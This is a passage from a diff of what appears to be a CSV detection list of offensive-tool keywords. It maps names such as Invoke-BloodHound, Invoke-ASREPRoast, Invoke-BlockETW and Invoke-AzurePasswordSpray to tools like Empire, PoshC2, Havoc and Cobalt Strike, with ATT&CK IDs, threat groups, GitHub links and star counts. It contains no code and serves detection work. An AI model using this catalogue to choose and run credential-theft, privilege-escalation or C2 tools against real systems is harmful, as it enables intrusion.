T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
-"*Invoke-ARPScan.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1077","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ApplicationsOnStartupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" 
+"*Invoke-ARPScan*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ARPScan.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-arpscan*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - 
T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-ARPScan.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1077","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
"*Invoke-ASREPRoast*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" -"*InvokeAssembly.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*InvokeAssembly.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*Invoke-AutoKerberoast*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" -"*Invoke-AzElevatedAccessToggle*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" 
-"*Invoke-AzRESTBastionShareableLink*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-AzElevatedAccessToggle*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-AzRESTBastionShareableLink*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" "*Invoke-AzureEnum.ps1*","offensive_tool_keyword","Invoke-AzureEnum","This cmdlet is used to perform users enumeration against Azure","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzureEnum.ps1","1","1","N/A","N/A","5","417","85","2023-04-05T22:03:19Z","2019-11-20T22:07:50Z" "*Invoke-AzurePasswordSpray*","offensive_tool_keyword","Invoke-AzurePasswordSpray","This cmdlet is used to perform a password spray attack against Azure accounts using legacy Basic Authentication","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzurePasswordSpray.ps1","1","1","N/A","N/A","5","417","85","2023-04-05T22:03:19Z","2019-11-20T22:07:50Z" -"*Invoke-AzureRmVMBulkCMD.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing 
Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Invoke-AzVMBulkCMD.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Invoke-BackdoorLNK*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan 
- APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BackdoorLNK.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-BackdoorLNK*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1115","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-BadPotato*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - 
T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-AzureRmVMBulkCMD.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-AzVMBulkCMD.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-BackdoorLNK*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BackdoorLNK.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-BackdoorLNK*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1115","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-BadPotato*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-BadZure*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation 
Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" -"*Invoke-BetterSafetyKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Binary *.exe*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" -"*Invoke-BitlockerCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-BlockETW*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-BlockETW*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-BetterSafetyKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Binary *.exe*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. 
A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*Invoke-BitlockerCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-BlockETW*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-BlockETW*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
"*InvokeBloodHound*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","0","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" -"*Invoke-BloodHound*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*invoke-bloodhound*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-BloodHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*Invoke-BloodHound*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*invoke-bloodhound*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-BloodHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*Invoke-Bof *","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 
